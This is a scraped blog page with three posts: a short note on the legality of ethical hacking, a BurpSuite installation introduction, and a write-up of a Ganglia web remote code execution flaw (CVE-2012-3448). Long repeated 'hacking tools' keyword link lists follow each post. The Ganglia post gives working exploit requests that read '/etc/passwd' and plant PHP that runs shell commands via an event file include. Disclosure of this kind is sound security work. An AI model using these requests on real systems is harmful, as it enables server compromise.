RSS


LEGALITY OF ETHICAL HACKING

0
Posted by KP-3မိသားစု |

Why ethical hacking?
Legality of Ehical Hacking
 
Ethical hacking is legal if the hacker abides by the rules stipulated in above section on the definition of ethical hacking.

Ethical hacking is not legal for black hat hackers.They gain unauthorized access over a computer system or networks for money extortion.
Related articles
  1. Pentest Tools Tcp Port Scanner
  2. Hack Apps
  3. Hacking Tools Kit
  4. Pentest Reporting Tools
  5. What Are Hacking Tools
  6. Bluetooth Hacking Tools Kali
  7. Hacker Tools 2019
  8. Hack Tools
  9. Hacker Hardware Tools
  10. Hacker Hardware Tools
  11. Pentest Tools Website
  12. Tools Used For Hacking
  13. Hacking Tools For Games
  14. Pentest Tools Nmap
  15. Blackhat Hacker Tools
  16. Pentest Tools Open Source
  17. Hacking Tools Mac
  18. Hacking Tools Download
  19. Hack Tools
  20. Hacking Tools For Beginners
  21. Hacking Tools Windows 10
  22. What Is Hacking Tools
  23. Pentest Tools Linux
  24. Best Hacking Tools 2019
  25. Pentest Automation Tools
  26. Github Hacking Tools
  27. World No 1 Hacker Software
  28. Pentest Tools For Mac
  29. Pentest Tools For Ubuntu
  30. Hack Website Online Tool
  31. Pentest Tools
  32. Pentest Tools Subdomain
  33. Beginner Hacker Tools
  34. Install Pentest Tools Ubuntu
  35. Hack Tool Apk
  36. Pentest Tools Subdomain
  37. Hacker Tools Linux
  38. Ethical Hacker Tools
  39. Hacking Tools Pc
  40. Nsa Hack Tools Download
  41. Hacking Tools Pc
  42. Best Hacking Tools 2019
  43. Pentest Tools Bluekeep
  44. Hacking Tools Online
  45. Game Hacking
  46. Best Hacking Tools 2019
  47. Hacking Tools Name
  48. Hack Tools Pc
  49. Pentest Tools Url Fuzzer
  50. How To Make Hacking Tools
  51. Hacker Tools For Windows
  52. Hack Tools Mac
  53. Hack And Tools
  54. Pentest Tools Bluekeep
  55. Hacks And Tools
  56. Hak5 Tools
  57. Pentest Tools Open Source
  58. Pentest Tools Review
  59. Game Hacking
  60. Pentest Tools Find Subdomains
  61. Hack Tools Download
  62. Hacker Tools Hardware
  63. Hack Tools Github
  64. Hacking Tools Free Download
  65. Underground Hacker Sites
  66. Hacker Tools Linux
  67. Hacker Tools 2019
  68. Pentest Tools Kali Linux
  69. Hacker Tools Software
  70. Pentest Tools Bluekeep
  71. Hacking Tools For Windows 7
  72. Best Hacking Tools 2020
  73. Hacker Tool Kit
  74. World No 1 Hacker Software
  75. Pentest Tools List
  76. Pentest Tools Website
  77. Hacker Tools Free
  78. Hacking Tools Windows
  79. Hacker Tools Mac
  80. Hacker Tools Free
  81. Pentest Tools Kali Linux
  82. Hacking Tools Kit
  83. Hacker Security Tools
  84. Hacker Tools Mac
  85. Hack Tools For Pc
  86. How To Install Pentest Tools In Ubuntu
  87. Hacks And Tools
  88. Hacking Tools Windows
  89. Hacking Tools 2020

Read more »


BurpSuite Introduction & Installation

0
Posted by KP-3မိသားစု |



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.

More articles


  1. Pentest Tools For Ubuntu
  2. Hacking Tools Online
  3. Hacker Tool Kit
  4. Pentest Recon Tools
  5. Hack Tools For Ubuntu
  6. Pentest Tools For Mac
  7. Hacker Tools For Mac
  8. Hacking Tools Kit
  9. Hacking Tools For Pc
  10. Github Hacking Tools
  11. Underground Hacker Sites
  12. Pentest Reporting Tools
  13. Hacking Tools Mac
  14. Best Pentesting Tools 2018
  15. Hacking Tools Kit
  16. Pentest Tools Bluekeep
  17. Install Pentest Tools Ubuntu
  18. Pentest Tools List
  19. Tools 4 Hack
  20. Pentest Tools Android
  21. Hack Tool Apk
  22. Hacker Tools 2019
  23. Hacker Tools Software
  24. Hacker Security Tools
  25. Hacking Tools For Kali Linux
  26. Android Hack Tools Github
  27. Pentest Tools Nmap
  28. Hack Tools 2019
  29. Hacking Tools And Software
  30. Pentest Recon Tools
  31. Hacking Tools Free Download
  32. Hacking Tools Online
  33. Pentest Tools For Ubuntu
  34. Hack Tools
  35. Tools 4 Hack
  36. Pentest Tools Android
  37. Hacker Hardware Tools
  38. Hacking Tools Name
  39. Hack Tool Apk
  40. Hack Tools For Games
  41. Pentest Box Tools Download
  42. Hacker
  43. Hack Rom Tools
  44. Hackers Toolbox
  45. Pentest Tools List
  46. Pentest Tools Subdomain
  47. New Hack Tools
  48. Kik Hack Tools
  49. Pentest Tools Online
  50. Pentest Tools For Android
  51. Pentest Tools Apk
  52. Pentest Tools Nmap
  53. Hacking Tools Github
  54. Hacker
  55. Hacker Security Tools
  56. Hacking Tools Windows 10
  57. Hacking Tools 2020
  58. Pentest Tools Framework
  59. Hackrf Tools
  60. Pentest Tools Tcp Port Scanner
  61. Hacking Tools Pc
  62. Hacks And Tools
  63. Hack Tools Mac
  64. Hacker Tools Online
  65. Pentest Tools Review
  66. Hack Tools
  67. Hacker Tools Free Download
  68. Pentest Tools Online
  69. Hacking Tools Online
  70. Hack App
  71. Hacking Tools Pc
  72. Hack Tool Apk No Root
  73. Pentest Tools Bluekeep
  74. Hacker Tools For Ios
  75. Pentest Tools Framework
  76. Install Pentest Tools Ubuntu
  77. Hacking Tools Windows 10
  78. Hacker Tools For Windows
  79. Hacker Techniques Tools And Incident Handling
  80. Tools Used For Hacking
  81. Hacker Tools 2019
  82. Beginner Hacker Tools
  83. Hacking Tools Free Download
  84. Nsa Hack Tools Download
  85. Android Hack Tools Github
  86. Underground Hacker Sites
  87. Hacker Tool Kit
  88. Hacker Tools Apk Download
  89. Install Pentest Tools Ubuntu
  90. Pentest Recon Tools
  91. Hacking Tools For Windows
  92. Best Hacking Tools 2020
  93. Underground Hacker Sites
  94. Easy Hack Tools
  95. Hack Tools Pc
  96. Hack Apps
  97. Best Hacking Tools 2019
  98. Beginner Hacker Tools
  99. Nsa Hacker Tools
  100. Pentest Tools Windows
  101. Nsa Hack Tools
  102. Pentest Tools For Mac
  103. Pentest Tools Find Subdomains
  104. Hack Rom Tools
  105. Hacking App
  106. Pentest Tools Find Subdomains
  107. New Hacker Tools
  108. Game Hacking
  109. Hacking Tools Software
  110. Hacker Tools Mac
  111. Hacking Tools Windows 10
  112. Hack Tools For Mac
  113. Pentest Tools Port Scanner
  114. Hack Tool Apk
  115. Pentest Tools Port Scanner
  116. Hack Rom Tools
  117. Hacker Tool Kit
  118. Blackhat Hacker Tools
  119. Termux Hacking Tools 2019
  120. Hacking Tools Mac
  121. Beginner Hacker Tools
  122. Pentest Tools Online
  123. Beginner Hacker Tools
  124. Hacker Tools Apk Download
  125. Kik Hack Tools
  126. Pentest Tools Linux
  127. Best Hacking Tools 2019
  128. Hack Tools For Pc
  129. Pentest Tools Website Vulnerability
  130. Hacking Tools And Software
  131. Hack Website Online Tool
  132. Pentest Tools Windows
  133. Pentest Tools Github
  134. Pentest Automation Tools
  135. Tools Used For Hacking
  136. Hack Tools Online
  137. Hacking Tools For Windows
  138. Hack Tools
  139. Hack And Tools
  140. What Are Hacking Tools
  141. Hacking Tools Hardware
  142. Hack Tools For Pc
  143. Pentest Tools For Ubuntu
  144. Hacking Tools For Games
  145. Underground Hacker Sites
  146. Hack Tools For Windows
  147. Bluetooth Hacking Tools Kali
  148. Hacking Tools Mac
  149. Pentest Tools Free
  150. Hacker Tools Free
  151. Hacker Tools For Windows
  152. Growth Hacker Tools
  153. How To Hack
  154. World No 1 Hacker Software
  155. Hack Tools Pc
  156. Hacker Tools For Mac
  157. Hacker
  158. Hacking Apps
  159. Hacker Tools Mac
  160. Hacking Tools And Software
  161. Pentest Tools Port Scanner
  162. Hacking Tools Windows 10
  163. Hacking Tools For Games
  164. Hacking Tools For Games
  165. Pentest Tools List

Read more »


Extending Your Ganglia Install With The Remote Code Execution API

0
Posted by KP-3မိသားစု |

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448

Read more


Read more »
2010 Hi There Theme designed by Wordpress Theme| Blogger Templates by Blogger Template | Bollywood Movie Wallpaper